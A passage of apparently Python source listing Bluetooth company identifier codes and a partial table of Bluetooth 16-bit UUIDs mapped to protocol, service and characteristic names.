MStarSemiconductorInc = 0x007a
HanlynnTechnologies = 0x007b
ARCambridge = 0x007c
SeersTechnologyCoLtd = 0x007d
SportsTrackingTechnologiesLtd = 0x007e
AutonetMobile = 0x007f
DeLormePublishingCompanyInc = 0x0080
WuXiVimicro = 0x0081
SennheiserCommunicationsAS = 0x0082
TimeKeepingSystemsInc = 0x0083
LudusHelsinkiLtd = 0x0084
BlueRadiosInc = 0x0085
equinoxAG = 0x0086
GarminInternationalInc = 0x0087
Ecotest = 0x0088
GNReSoundAS = 0x0089
Jawbone = 0x008a
TopcornPositioningSystemsLLC = 0x008b
GimbalInc = 0x008c
ZscanSoftware = 0x008d
QuinticCorp = 0x008e
StollmanEVGmbH = 0x008f
FunaiElectricCoLtd = 0x0090
AdvancedPANMOBILSystemsGmbHCoKG = 0x0091
ThinkOpticsInc = 0x0092
UniversalElectronicsInc = 0x0093
AirohaTechnologyCorp = 0x0094
NECLightingLtd = 0x0095
ODMTechnologyInc = 0x0096
ConnecteDeviceLtd = 0x0097
zer01tvGmbH = 0x0098
iTechDynamicGlobalDistributionLtd = 0x0099
Alpwise = 0x009a
JiangsuToppowerAutomotiveElectronicsCoLtd = 0x009b
ColorfyInc = 0x009c
GeoforceInc = 0x009d
BoseCorporation = 0x009e
SuuntoOy = 0x009f
KensingtonComputerProductsGroup = 0x00a0
SRMedizinelektronik = 0x00a1
VertuCorporationLimited = 0x00a2
MetaWatchLtd = 0x00a3
LINAKAS = 0x00a4
OTLDynamicsLLC = 0x00a5
PandaOceanInc = 0x00a6
VisteonCorporation = 0x00a7
ARPDevicesLimited = 0x00a8
MagnetiMarelliSpA = 0x00a9
CAENRFIDsrl = 0x00aa
IngenieurSystemgruppeZahnGmbH = 0x00ab
GreenThrottleGames = 0x00ac
PeterSystemtechnikGmbH = 0x00ad
OmegawaveOy = 0x00ae
Cinetix = 0x00af
PassifSemiconductorCorp = 0x00b0
SarisCyclingGroupInc = 0x00b1
BekeyAS = 0x00b2
ClarinoxTechnologiesPtyLtd = 0x00b3
BDETechnologyCoLtd = 0x00b4
SwirlNetworks = 0x00b5
Mesointernational = 0x00b6
TreLabLtd = 0x00b7
QualcommInnovationCenterInc = 0x00b8
JohnsonControlsInc = 0x00b9
StarkeyLaboratoriesInc = 0x00ba
SPowerElectronicsLimited = 0x00bb
AceSensorInc = 0x00bc
AplixCorporation = 0x00bd
AAMPofAmerica = 0x00be
StalmartTechnologyLimited = 0x00bf
AMICCOMElectronicsCorporation = 0x00c0
ShenzhenExcelsecuDataTechnologyCoLtd = 0x00c1
GeneqInc = 0x00c2
adidasAG = 0x00c3
LGElectronics = 0x00c4
OnsetComputerCorporation = 0x00c5
SelflyBV = 0x00c6
QuuppaOy = 0x00c7
GeLoInc = 0x00c8
Evluma = 0x00c9
MC10 = 0x00ca
BinauricSE = 0x00cb
BeatsElectronics = 0x00cc
MicrochipTechnologyInc = 0x00cd
ElgatoSystemsGmbH = 0x00ce
ARCHOSSA = 0x00cf
DexcomInc = 0x00d0
PolarElectroEuropeBV = 0x00d1
DialogSemiconductorBV = 0x00d2
TaixingbangTechnologyCoLTD = 0x00d3
Kawantech = 0x00d4
AustcoCommunicationSystems = 0x00d5
TimexGroupUSAInc = 0x00d6
QualcommTechnologiesInc = 0x00d7
QualcommConnectedExperiencesInc = 0x00d8
VoyetraTurtleBeach = 0x00d9
txtrGmbH = 0x00da
Biosentronics = 0x00db
ProcterGamble = 0x00dc
HosidenCorporation = 0x00dd
MuzikLLC = 0x00de
MisfitWearablesCorp = 0x00df
Google = 0x00e0
DanlersLtd = 0x00e1
SemilinkInc = 0x00e2
inMusicBrandsInc = 0x00e3
LSResearchInc = 0x00e4
EdenSoftwareConsultantsLtd = 0x00e5
Freshtemp = 0x00e6
KSTechnologies = 0x00e7
ACTSTechnologies = 0x00e8
VtrackSystems = 0x00e9
NielsenKellermanCompany = 0x00ea
ServerTechnologyInc = 0x00eb
BioResearchAssociates = 0x00ec
JollyLogicLLC = 0x00ed
AboveAverageOutcomesInc = 0x00ee
BitsplittersGmbH = 0x00ef
PayPalInc = 0x00f0
WitronTechnologyLimited = 0x00f1
AetherThingsInc = 0x00f2
KentDisplaysInc = 0x00f3
NautilusInc = 0x00f4
SmartifierOy = 0x00f5
ElcometerLimited = 0x00f6
VSNTechnologiesInc = 0x00f7
AceUniCorpLtd = 0x00f8
StickNFind = 0x00f9
CrystalCodeAB = 0x00fa
KOUKAAMas = 0x00fb
DelphiCorporation = 0x00fc
ValenceTechLimited = 0x00fd
Reserved = 0x00fe
TypoProductsLLC = 0x00ff
TomTomInternationalBV = 0x0100
FugooInc = 0x0101
KeiserCorporation = 0x0102
BangOlufsenAS = 0x0103
PLUSLocationsSystemsPtyLtd = 0x0104
UbiquitousComputingTechnologyCorporation = 0x0105
InnovativeYachtterSolutions = 0x0106
WilliamDemantHoldingAS = 0x0107
ChiconyElectronicsCoLtd = 0x0108
AtusBV = 0x0109
CodegateLtd = 0x010a
ERiInc = 0x010b
TransducersDirectLLC = 0x010c
FujitsuTenLimited = 0x010d
AudiAG = 0x010e
HiSiliconTechnologiesCoLtd = 0x010f
NipponSeikiCoLtd = 0x0110
SteelseriesApS = 0x0111
VisyblInc = 0x0112
OpenbrainTechnologiesCoLtd = 0x0113
Xensr = 0x0114
esolutions = 0x0115
OneOAKTechnologies = 0x0116
WimotoTechnologiesInc = 0x0117
RadiusNetworksInc = 0x0118
WizeTechnologyCoLtd = 0x0119
QualcommLabsInc = 0x011a
ArubaNetworks = 0x011b
Baidu = 0x011c
ArendiAG = 0x011d
SkodaAutoas = 0x011e
VolkswagonAG = 0x011f
PorscheAG = 0x0120
SinoWealthElectronicLtd = 0x0121
AirTurnInc = 0x0122
KinsaInc = 0x0123
HIDGlobal = 0x0124
SEATes = 0x0125
PrometheanLtd = 0x0126
SaluticaAlliedSolutions = 0x0127
GPSIGroupPtyLtd = 0x0128
NimbleDevicesOy = 0x0129
ChangzhouYongseInfotechCoLtd = 0x012a
SportIQ = 0x012b
TEMECInstrumentsBV = 0x012c
SonyCorporation = 0x012d
ASSAABLOY = 0x012e
ClarionCoLtd = 0x012f
WarehouseInnovations = 0x0130
CypressSemiconductorCorporation = 0x0131
MADSInc = 0x0132
BlueMaestroLimited = 0x0133
ResolutionProductsInc = 0x0134
AirewearLLC = 0x0135
SeedLabsInc = 0x0136
PrestigioPlazaLtd = 0x0137
NTEOInc = 0x0138
FocusSystemsCorporation = 0x0139
TencentHoldingsLimited = 0x013a
Allegion = 0x013b
MurataManufacuringCoLtd = 0x013c
NodInc = 0x013e
BBManufacturingCompany = 0x013f
AlpineElectronicsCoLtd = 0x0140
FedExServices = 0x0141
GrapeSystemsInc = 0x0142
BkonConnect = 0x0143
LintechGmbH = 0x0144
NovatelWireless = 0x0145
Ciright = 0x0146
MightyCastInc = 0x0147
AmbimatElectronics = 0x0148
PerytonsLtd = 0x0149
TivoliAudioLLC = 0x014a
MasterLock = 0x014b
MeshNetLtd = 0x014c
HuizhouDesaySVAutomotiveCOLTD = 0x014d
TangerineInc = 0x014e
BWGroupLtd = 0x014f
PioneerCorporation = 0x0150
OnBeep = 0x0151
VernierSoftwareTechnology = 0x0152
ROLErgo = 0x0153
PebbleTechnology = 0x0154
NETATMO = 0x0155
AccumulateAB = 0x0156
AnhuiHuamiInformationTechnologyCoLtd = 0x0157
Inmitesro = 0x0158
ChefStepsInc = 0x0159
micasAG = 0x015a
BiomedicalResearchLtd = 0x015b
PitiusTecSL = 0x015c
EstimoteInc = 0x015d
UnikeyTechnologiesInc = 0x015e
TimerCapCo = 0x015f
AwoX = 0x0160
yikes = 0x0161
MADSGlobalNZLtd = 0x0162
PCHInternational = 0x0163
QingdaoYeelinkInformationTechnologyCoLtd = 0x0164
MilwaukeeTool = 0x0165
MISHIKPteLtd = 0x0166
BayerHealthCare = 0x0167
SpiceboxLLC = 0x0168
emberlight = 0x0169
CooperAtkinsCorporation = 0x016a
Qblinks = 0x016b
MYSPHERA = 0x016c
LifeScanInc = 0x016d
VolanticAB = 0x016e
PodoLabsInc = 0x016f
FHoffmannLaRocheAG = 0x0170
AmazonFulfillmentService = 0x0171
ConnovateTechnologyPrivateLimited = 0x0172
KocomojoLLC = 0x0173
EverykeyLLC = 0x0174
DynamicControls = 0x0175
SentriLock = 0x0176
ISYSTinc = 0x0177
CASIOCOMPUTERCOLTD = 0x0178
LAPISSemiconductorCoLtd = 0x0179
TelemonitorInc = 0x017a
taskitGmbH = 0x017b
DaimlerAG = 0x017c
BatAndCat = 0x017d
BluDotzLtd = 0x017e
XTelApS = 0x017f
GigasetCommunicationsGmbH = 0x0180
GeckoHealthInnovationsInc = 0x0181
HOPUbiquitous = 0x0182
ToBeAssigned = 0x0183
Nectar = 0x0184
belappsLLC = 0x0185
CORELightingLtd = 0x0186
SeraphimSenseLtd = 0x0187
UnicoRBC = 0x0188
PhysicalEnterprisesInc = 0x0189
AbleTrendTechnologyLimited = 0x018a
KonicaMinoltaInc = 0x018b
WiloSE = 0x018c
ExtronDesignServices = 0x018d
FitbitInc = 0x018e
FirefliesSystems = 0x018f
IntellettoTechnologiesInc = 0x0190
FDKCORPORATION = 0x0191
CloudleafInc = 0x0192
MavericAutomationLLC = 0x0193
AcousticStreamCorporation = 0x0194
Zuli = 0x0195
PaxtonAccessLtd = 0x0196
WiSilicaInc = 0x0197
VengitLimited = 0x0198
SALTOSYSTEMSSL = 0x0199
TRONForum = 0x019a
CUBETECHsro = 0x019b
CokiyaIncorporated = 0x019c
CVSHealth = 0x019d
Ceruus = 0x019e
StrainstallLtd = 0x019f
ChannelEnterprisesLtd = 0x01a0
FIAMM = 0x01a1
GIGALANECOLTD = 0x01a2
EROAD = 0x01a3
MineSafetyAppliances = 0x01a4
IconHealthandFitness = 0x01a5
AsandooGmbH = 0x01a6
ENERGOUSCORPORATION = 0x01a7
Taobao = 0x01a8
CanonInc = 0x01a9
GeophysicalTechnologyInc = 0x01aa
FacebookInc = 0x01ab
NiproDiagnosticsInc = 0x01ac
FlightSafetyInternational = 0x01ad
EarlensCorporation = 0x01ae
SunriseMicroDevicesInc = 0x01af
StarMicronicsCoLtd = 0x01b0
NetizensSpzoo = 0x01b1
NymiInc = 0x01b2
NytecInc = 0x01b3
TrineoSpzoo = 0x01b4
NestLabsInc = 0x01b5
LMTechnologiesLtd = 0x01b6
GeneralElectricCompany = 0x01b7
iD3SL = 0x01b8
HANAMicron = 0x01b9
StagesCyclingLLC = 0x01ba
CochlearBoneAnchoredSolutionsAB = 0x01bb
SenionLabAB = 0x01bc
SyszoneCoLtd = 0x01bd
PulsateMobileLtd = 0x01be
HongKongHunterSunElectronicLimited = 0x01bf
pironexGmbH = 0x01c0
BRADATECHCorp = 0x01c1
TransenergooilAG = 0x01c2
Bunch = 0x01c3
DMEMicroelectronics = 0x01c4
BitcrazeAB = 0x01c5
HASWAREInc = 0x01c6
AbiogenixInc = 0x01c7
PolyControlApS = 0x01c8
Avion = 0x01c9
LaerdalMedicalAS = 0x01ca
FetchMyPet = 0x01cb
SamLabsLtd = 0x01cc
ChengduSynwingTechnologyLtd = 0x01cd
HOUWASYSTEMDESIGNkk = 0x01ce
BSH = 0x01cf
PrimusInterParesLtd = 0x01d0
August = 0x01d1
GillElectronics = 0x01d2
SkyWaveDesign = 0x01d3
NewlabSrl = 0x01d4
ELADsrl = 0x01d5
Gwearablesinc = 0x01d6
SquadroneSystemsInc = 0x01d7
CodeCorporation = 0x01d8
SavantSystemsLLC = 0x01d9
LogitechInternationalSA = 0x01da
InnblueConsulting = 0x01db
iParkingLtd = 0x01dc
KoninklijkePhilipsElectronicsNV = 0x01dd
MinelabElectronicsPtyLimited = 0x01de
BisonGroupLtd = 0x01df
WidexAS = 0x01e0
JollaLtd = 0x01e1
LectronixInc = 0x01e2
CaterpillarInc = 0x01e3
FreedomInnovations = 0x01e4
DynamicDevicesLtd = 0x01e5
TechnologySolutionsLtd = 0x01e6
IPSGroupInc = 0x01e7
STIR = 0x01e8
SanoInc = 0x01e9
AdvancedApplicationDesignInc = 0x01ea
AutoMapLLC = 0x01eb
SpreadtrumCommunicationsShanghaiLtd = 0x01ec
CuteCircuitLTD = 0x01ed
ValeoService = 0x01ee
FullpowerTechnologiesInc = 0x01ef
KloudNation = 0x01f0
ZebraTechnologiesCorporation = 0x01f1
ItronInc = 0x01f2
TheUniversityofTokyo = 0x01f3
UTCFireandSecurity = 0x01f4
CoolWebthingsLimited = 0x01f5
DJOGlobal = 0x01f6
GellinerLimited = 0x01f7
AnykaMicroelectronicsTechnologyCoLTD = 0x01f8
MedtronicInc = 0x01f9
GozioInc = 0x01fa
FormLiftingLLC = 0x01fb
WahooFitnessLLC = 0x01fc
KontaktMicroLocationSpzoo = 0x01fd
RadioSystemCorporation = 0x01fe
FreescaleSemiconductorInc = 0x01ff
VerifoneSystemsPTeLtdTaiwanBranch = 0x0200
ARTiming = 0x0201
RigadoLLC = 0x0202
KemppiOy = 0x0203
TapcentiveInc = 0x0204
SmartboticsInc = 0x0205
OtterProductsLLC = 0x0206
STEMPInc = 0x0207
LumiGeekLLC = 0x0208
InvisionHeartInc = 0x0209
MacnicaInc = 0x020a
JaguarLandRoverLimited = 0x020b
CoroWareTechnologiesInc = 0x020c
SimploTechnologyCoLTD = 0x020d
OmronHealthcareCoLTD = 0x020e
ComoduleGMBH = 0x020f
ikeGPS = 0x0210
TelinkSemiconductorCoLtd = 0x0211
InterplanCoLtd = 0x0212
WylerAG = 0x0213
IKMultimediaProductionsrl = 0x0214
LukotonExperienceOy = 0x0215
MTILtd = 0x0216
Tech4homeLda = 0x0217
HiotechAB = 0x0218
DOTTLimited = 0x0219
BlueSpeckLabsLLC = 0x021a
CiscoSystemsInc = 0x021b
MobicommInc = 0x021c
Edamic = 0x021d
GoodnetLtd = 0x021e
LusterLeafProductsInc = 0x021f
ManusMachinaBV = 0x0220
MobiquityNetworksInc = 0x0221
PraxisDynamics = 0x0222
PhilipMorrisProductsSA = 0x0223
ComarchSA = 0x0224
NestlNespressoSA = 0x0225
MerliniaAS = 0x0226
LifeBEAMTechnologies = 0x0227
TwocanoesLabsLLC = 0x0228
MuovertiLimited = 0x0229
StamerMusikanlagenGMBH = 0x022a
TeslaMotors = 0x022b
PharynksCorporation = 0x022c
Lupine = 0x022d
SiemensAG = 0x022e
HuamiCultureCommunicationCOLTD = 0x022f
FosterElectricCompanyLtd = 0x0230
ETASA = 0x0231
xSensoSolutionsKft = 0x0232
ShenzhenSuLongCommunicationLtd = 0x0233
FengFanTechnologyCoLtd = 0x0234
QrioInc = 0x0235
PitpatpetLtd = 0x0236
MSHelisrl = 0x0237
Trakm8Ltd = 0x0238
JINCOLtd = 0x0239
AlatechTechnology = 0x023a
BeijingCarePulseElectronicTechnologyCoLtd = 0x023b
Awarepoint = 0x023c
ViCentraBV = 0x023d
RavenIndustries = 0x023e
WaveWareTechnologies = 0x023f
ArgenoxTechnologies = 0x0240
BragiGmbH = 0x0241
SixteenLabInc = 0x0242
MasimoCorp = 0x0243
IoteraInc = 0x0244
EndressHauser = 0x0245
ACKmeNetworksInc = 0x0246
FiftyThreeInc = 0x0247
ParkerHannifinCorp = 0x0248
TranscranialLtd = 0x0249
UwatecAG = 0x024a
OrlanLLC = 0x024b
BlueCloverDevices = 0x024c
MWaySolutionsGmbH = 0x024d
MicrotronicsEngineeringGmbH = 0x024e
SchneiderSchreibgerteGmbH = 0x024f
SapphireCircuitsLLC = 0x0250
LumoBodytechInc = 0x0251
UKCTechnosolution = 0x0252
XicatoInc = 0x0253
Playbrush = 0x0254
DaiNipponPrintingCoLtd = 0x0255
G24PowerLimited = 0x0256
AdBabbleLocalCommerceInc = 0x0257
DevialetSA = 0x0258
ALTYOR = 0x0259
UniversityofAppliedSciencesValaisHauteEcoleValaisanne = 0x025a
FiveInteractiveLLCdbaZendo = 0x025b
NetEaseNetworkcoLtd = 0x025c
LexmarkInternationalInc = 0x025d
FlukeCorporation = 0x025e
YardarmTechnologies = 0x025f
SensaRx = 0x0260
SECVREGmbH = 0x0261
GlacialRidgeTechnologies = 0x0262
IdentivInc = 0x0263
DDSInc = 0x0264
SMKCorporation = 0x0265
SchawbelTechnologiesLLC = 0x0266
XMISystemsSA = 0x0267
Cerevo = 0x0268
TorroxGmbHCoKG = 0x0269
Gemalto = 0x026a
DEKAResearchDevelopmentCorp = 0x026b
DomsterTadeuszSzydlowski = 0x026c
TechnogymSPA = 0x026d
FLEURBAEYBVBA = 0x026e
AptcodeSolutions = 0x026f
LSIADLTechnology = 0x0270
AnimasCorp = 0x0271
AlpsElectricCoLtd = 0x0272
OCEASOFT = 0x0273
MotsaiResearch = 0x0274
Geotab = 0x0275
EGOElektroGertebauGmbH = 0x0276
bewhereinc = 0x0277
JohnsonOutdoorsInc = 0x0278
steuteSchaltgerateGmbHCoKG = 0x0279
Ekominiinc = 0x027a
DEFAAS = 0x027b
AseptikaLtd = 0x027c
HUAWEITechnologiesCoLtd = 0x027d
HabitAwareLLC = 0x027e
ruwidoaustriagmbh = 0x027f
ITECcorporation = 0x0280
StoneL = 0x0281
SonovaAG = 0x0282
MavenMachinesInc = 0x0283
SynapseElectronics = 0x0284
StandardInnovationInc = 0x0285
RFCodeInc = 0x0286
WallyVenturesSL = 0x0287
WillowbankElectronicsLtd = 0x0288
SKTelecom = 0x0289
JetroAS = 0x028a
CodeGearsLTD = 0x028b
NANOLINKAPS = 0x028c
IFLLC = 0x028d
RFDigitalCorp = 0x028e
ChurchDwightCoInc = 0x028f
MultibitOy = 0x0290
CliniCloudInc = 0x0291
SwiftSensors = 0x0292
BlueBite = 0x0293
ELIASGmbH = 0x0294
SivantosGmbH = 0x0295
Petzl = 0x0296
stormpowerltd = 0x0297
EISSTLtd = 0x0298
InexessTechnologySimmaKG = 0x0299
CurrantInc = 0x029a
C2DevelopmentInc = 0x029b
BlueSkyScientificLLCA = 0x029c
ALOTTAZSLABSLLC = 0x029d
Kupsonspolsro = 0x029e
AreusEngineeringGmbH = 0x029f
ImpossibleCameraGmbH = 0x02a0
InventureTrackSystems = 0x02a1
LockedUp = 0x02a2
Itude = 0x02a3
PacificLockCompany = 0x02a4
TendyronCorporation = 0x02a5
RobertBoschGmbH = 0x02a6
IlluxtroninternationalBV = 0x02a7
miSportLtd = 0x02a8
Chargelib = 0x02a9
DopplerLab = 0x02aa
BBPOSLimited = 0x02ab
RTBElektronikGmbHCoKG = 0x02ac
RxNetworksInc = 0x02ad
WeatherFlowInc = 0x02ae
TechnicolorUSAInc = 0x02af
BestechnicLtd = 0x02b0
RadenInc = 0x02b1
JouZenOy = 0x02b2
CLABERSPA = 0x02b3
HyginexInc = 0x02b4
HANSHINELECTRICRAILWAYCOLTD = 0x02b5
SchneiderElectric = 0x02b6
OortTechnologiesLLC = 0x02b7
ChronoTherapeutics = 0x02b8
RinnaiCorporation = 0x02b9
SwissprimeTechnologiesAG = 0x02ba
KohaCoLtd = 0x02bb
GenevacLtd = 0x02bc
Chemtronics = 0x02bd
SeguroTechnologySpzoo = 0x02be
RedbirdFlightSimulations = 0x02bf
DashRobotics = 0x02c0
LINECorporation = 0x02c1
GuillemotCorporation = 0x02c2
TechtronicPowerToolsTechnologyLimited = 0x02c3
WilsonSportingGoods = 0x02c4
LenovoPteLtd = 0x02c5
AyatanSensors = 0x02c6
ElectronicsTomorrowLimited = 0x02c7
VASCODataSecurityInternationalInc = 0x02c8
PayRangeInc = 0x02c9
ABOVSemiconductor = 0x02ca
AINAWirelessInc = 0x02cb
EijkelkampSoilWater = 0x02cc
BMAergonomicsbv = 0x02cd
TevaBrandedPharmaceuticalProductsRDInc = 0x02ce
Anima = 0x02cf
ThreeM = 0x02d0
EmpaticaSrl = 0x02d1
AferoInc = 0x02d2
PowercastCorporation = 0x02d3
SecuyouApS = 0x02d4
OMRONCorporation = 0x02d5
SendSolutions = 0x02d6
NIPPONSYSTEMWARECOLTD = 0x02d7
Neosfar = 0x02d8
FlieglAgrartechnikGmbH = 0x02d9
Gilvader = 0x02da
DigiInternationalInc = 0x02db
DeWalchTechnologiesInc = 0x02dc
FlintRehabilitationDevicesLLC = 0x02dd
SamsungSDSCoLtd = 0x02de
BlurProductDevelopment = 0x02df
UniversityofMichigan = 0x02e0
VictronEnergyBV = 0x02e1
NTTdocomo = 0x02e2
CarmanahTechnologiesCorp = 0x02e3
BytestormLtd = 0x02e4
EspressifIncorporated = 0x02e5
Unwire = 0x02e6
ConnectedYardInc = 0x02e7
AmericanMusicEnvironments = 0x02e8
SensogramTechnologiesInc = 0x02e9
FujitsuLimited = 0x02ea
ArdicTechnology = 0x02eb
DeltaSystemsInc = 0x02ec
HTCCorporation = 0x02ed
CitizenHoldingsCoLtd = 0x02ee
SMARTINNOVATIONinc = 0x02ef
BlackratSoftware = 0x02f0
TheIdeaCaveLLC = 0x02f1
GoProInc = 0x02f2
AuthAirInc = 0x02f3
VensiInc = 0x02f4
IndagemTechLLC = 0x02f5
IntemoTechnologies = 0x02f6
DreamVisionscoLtd = 0x02f7
RunteqOyLtd = 0x02f8
IMAGINATIONTECHNOLOGIESLTD = 0x02f9
CoSTARTechnologies = 0x02fa
ClariusMobileHealthCorp = 0x02fb
ShanghaiFrequenMicroelectronicsCoLtd = 0x02fc
UwannaInc = 0x02fd
LierdaScienceTechnologyGroupCoLtd = 0x02fe
SiliconLaboratories = 0x02ff
WorldMotoInc = 0x0300
GiatecScientificInc = 0x0301
LoopDevicesInc = 0x0302
IACAelectronique = 0x0303
MartiansInc = 0x0304
SwippApS = 0x0305
LifeLaboratoryInc = 0x0306
FUJIINDUSTRIALCOLTD = 0x0307
SurefireLLC = 0x0308
DolbyLabs = 0x0309
Ellisys = 0x030a
MagnitudeLightingConverters = 0x030b
HiltiAG = 0x030c
DevdataSrl = 0x030d
Deviceworx = 0x030e
ShortcutLabs = 0x030f
SGLItaliaSrl = 0x0310
PEEQDATA = 0x0311
DucereTechnologiesPvtLtd = 0x0312
DiveNavInc = 0x0313
RIIGAISpzoo = 0x0314
ThermoFisherScientific = 0x0315
AGMeasurematicsPvtLtd = 0x0316
CHUOElectronicsCOLTD = 0x0317
AspentaInternational = 0x0318
EugsterFrismagAG = 0x0319
AmberwirelessGmbH = 0x031a
HQInc = 0x031b
LabSensorSolutions = 0x031c
EnterlabApS = 0x031d
EyefiInc = 0x031e
MetaSystemSpA = 0x031f
SONOELECTRONICSCOLTD = 0x0320
Jewelbots = 0x0321
CompumedicsLimited = 0x0322
RotorBikeComponents = 0x0323
AstroInc = 0x0324
AmotusSolutions = 0x0325
HealthwearTechnologiesLtd = 0x0326
EssexElectronics = 0x0327
GrundfosAS = 0x0328
EargoInc = 0x0329
ElectronicDesignLab = 0x032a
ESYLUX = 0x032b
NIPPONSMTCOLtd = 0x032c
BMinnovationsGmbH = 0x032d
indoormap = 0x032e
OttoQInc = 0x032f
NorthPoleEngineering = 0x0330
ThreeFlaresTechnologiesInc = 0x0331
ElectrocompanietAS = 0x0332
MulTLock = 0x0333
CorentiumAS = 0x0334
EnlightedInc = 0x0335
GISTIC = 0x0336
AJP2HoldingsLLC = 0x0337
COBIGmbH = 0x0338
BlueSkyScientificLLCB = 0x0339
AppceptionInc = 0x033a
CourtneyThorneLimited = 0x033b
Virtuosys = 0x033c
TPVTechnologyLimited = 0x033d
MonitraSA = 0x033e
AutomationComponentsInc = 0x033f
Letsensesrl = 0x0340
EtesianTechnologiesLLC = 0x0341
GERTECBRASILLTDA = 0x0342
DrekkerDevelopmentPtyLtd = 0x0343
WhirlInc = 0x0344
LocusPositioning = 0x0345
AcuityBrandsLightingInc = 0x0346
PreventBiometrics = 0x0347
Arioneo = 0x0348
VersaMe = 0x0349
Vaddio = 0x034a
LibratoneAS = 0x034b
HMElectronicsInc = 0x034c
TASERInternationalInc = 0x034d
SafeTrustInc = 0x034e
HeartlandPaymentSystems = 0x034f
BitstrataSystemsInc = 0x0350
PiepsGmbH = 0x0351
iRidingTechnologyCoLtd = 0x0352
AlphaAudiotronicsInc = 0x0353
TOPPANFORMSCOLTD = 0x0354
SigmaDesignsInc = 0x0355
RESERVED = 0xffff
ALL_16BIT_UUIDS = {
0x0001: "SDP",
0x0003: "RFCOMM",
0x0005: "TCS-BIN",
0x0007: "ATT",
0x0008: "OBEX",
0x000f: "BNEP",
0x0010: "UPNP",
0x0011: "HIDP",
0x0012: "Hardcopy Control Channel",
0x0014: "Hardcopy Data Channel",
0x0016: "Hardcopy Notification",
0x0017: "AVCTP",
0x0019: "AVDTP",
0x001b: "CMTP",
0x001e: "MCAP Control Channel",
0x001f: "MCAP Data Channel",
0x0100: "L2CAP",
    # 0x0101 to 0x0fff undefined
0x1000: "Service Discovery Server Service Class",
0x1001: "Browse Group Descriptor Service Class",
0x1002: "Public Browse Root",
    # 0x1003 to 0x1100 undefined
0x1101: "Serial Port",
0x1102: "LAN Access Using PPP",
0x1103: "Dialup Networking",
0x1104: "IrMC Sync",
0x1105: "OBEX Object Push",
0x1106: "OBEX File Transfer",
0x1107: "IrMC Sync Command",
0x1108: "Headset",
0x1109: "Cordless Telephony",
0x110a: "Audio Source",
0x110b: "Audio Sink",
0x110c: "A/V Remote Control Target",
0x110d: "Advanced Audio Distribution",
0x110e: "A/V Remote Control",
0x110f: "A/V Remote Control Controller",
0x1110: "Intercom",
0x1111: "Fax",
0x1112: "Headset AG",
0x1113: "WAP",
0x1114: "WAP Client",
0x1115: "PANU",
0x1116: "NAP",
0x1117: "GN",
0x1118: "Direct Printing",
0x1119: "Reference Printing",
0x111a: "Basic Imaging Profile",
0x111b: "Imaging Responder",
0x111c: "Imaging Automatic Archive",
0x111d: "Imaging Referenced Objects",
0x111e: "Handsfree",
0x111f: "Handsfree Audio Gateway",
0x1120: "Direct Printing Refrence Objects Service",
0x1121: "Reflected UI",
0x1122: "Basic Printing",
0x1123: "Printing Status",
0x1124: "Human Interface Device Service",
0x1125: "Hardcopy Cable Replacement",
0x1126: "HCR Print",
0x1127: "HCR Scan",
0x1128: "Common ISDN Access",
    # 0x1129 and 0x112a undefined
0x112d: "SIM Access",
0x112e: "Phonebook Access Client",
0x112f: "Phonebook Access Server",
0x1130: "Phonebook Access",
0x1131: "Headset HS",
0x1132: "Message Access Server",
0x1133: "Message Notification Server",
0x1134: "Message Access Profile",
0x1135: "GNSS",
0x1136: "GNSS Server",
0x1137: "3D Display",
0x1138: "3D Glasses",
0x1139: "3D Synchronization",
0x113a: "MPS Profile",
0x113b: "MPS Service",
    # 0x113c to 0x11ff undefined
0x1200: "PnP Information",
0x1201: "Generic Networking",
0x1202: "Generic File Transfer",
0x1203: "Generic Audio",
0x1204: "Generic Telephony",
0x1205: "UPNP Service",
0x1206: "UPNP IP Service",
0x1300: "UPNP IP PAN",
0x1301: "UPNP IP LAP",
0x1302: "UPNP IP L2CAP",
0x1303: "Video Source",
0x1304: "Video Sink",
0x1305: "Video Distribution",
    # 0x1306 to 0x13ff undefined
0x1400: "HDP",
0x1401: "HDP Source",
0x1402: "HDP Sink",
    # 0x1403 to 0x17ff undefined
0x1800: "Generic Access Profile",
0x1801: "Generic Attribute Profile",
0x1802: "Immediate Alert",
0x1803: "Link Loss",
0x1804: "Tx Power",
0x1805: "Current Time Service",
0x1806: "Reference Time Update Service",
0x1807: "Next DST Change Service",
0x1808: "Glucose",
0x1809: "Health Thermometer",
0x180a: "Device Information",
    # 0x180b and 0x180c undefined
0x180d: "Heart Rate",
0x180e: "Phone Alert Status Service",
0x180f: "Battery Service",
0x1810: "Blood Pressure",
0x1811: "Alert Notification Service",
0x1812: "Human Interface Device",
0x1813: "Scan Parameters",
0x1814: "Running Speed and Cadence",
0x1815: "Automation IO",
0x1816: "Cycling Speed and Cadence",
    # 0x1817 undefined
0x1818: "Cycling Power",
0x1819: "Location and Navigation",
0x181a: "Environmental Sensing",
0x181b: "Body Composition",
0x181c: "User Data",
0x181d: "Weight Scale",
0x181e: "Bond Management",
0x181f: "Continuous Glucose Monitoring",
0x1820: "Internet Protocol Support",
0x1821: "Indoor Positioning",
0x1822: "Pulse Oximeter",
0x1823: "HTTP Proxy",
0x1824: "Transport Discovery",
0x1825: "Object Transfer",
    # 0x1826 to 0x27ff undefined
0x2800: "Primary Service",
0x2801: "Secondary Service",
0x2802: "Include",
0x2803: "Characteristic",
    # 0x2804 to 0x28ff undefined
0x2900: "Characteristic Extended Properties",
0x2901: "Characteristic User Description",
0x2902: "Client Characteristic Configuration",
0x2903: "Server Characteristic Configuration",
0x2904: "Characteristic Format",
0x2905: "Characteristic Aggregate Formate",
0x2906: "Valid Range",
0x2907: "External Report Reference",
0x2908: "Report Reference",
0x2909: "Number of Digitals",
0x290a: "Value Trigger Setting",
0x290b: "Environmental Sensing Configuration",
0x290c: "Environmental Sensing Measurement",
0x290d: "Environmental Sensing Trigger Setting",
0x290e: "Time Trigger Setting",
    # 0x290f to 0x29ff undefined
0x2a00: "Device Name",
0x2a01: "Appearance",
0x2a02: "Peripheral Privacy Flag",
0x2a03: "Reconnection Address",
0x2a04: "Peripheral Preferred Connection Parameters",
0x2a05: "Service Changed",
0x2a06: "Alert Level",
0x2a07: "Tx Power Level",
0x2a08: "Date Time",
0x2a09: "Day of Week",
0x2a0a: "Day Date Time",
    # 0x2a0b undefined
0x2a0c: "Exact Time 256",
0x2a0d: "DST Offset",
0x2a0e: "Time Zone",
0x2a0f: "Local Time Information",
    # 0x2a10 undefined
0x2a11: "Time with DST",
0x2a12: "Time Accuracy",
0x2a13: "Time Source",
0x2a14: "Reference Time Information",
    # 0x2a15 undefined
0x2a16: "Time Update Control Point",
0x2a17: "Time Update State",
0x2a18: "Glucose Measurement",
0x2a19: "Battery Level",
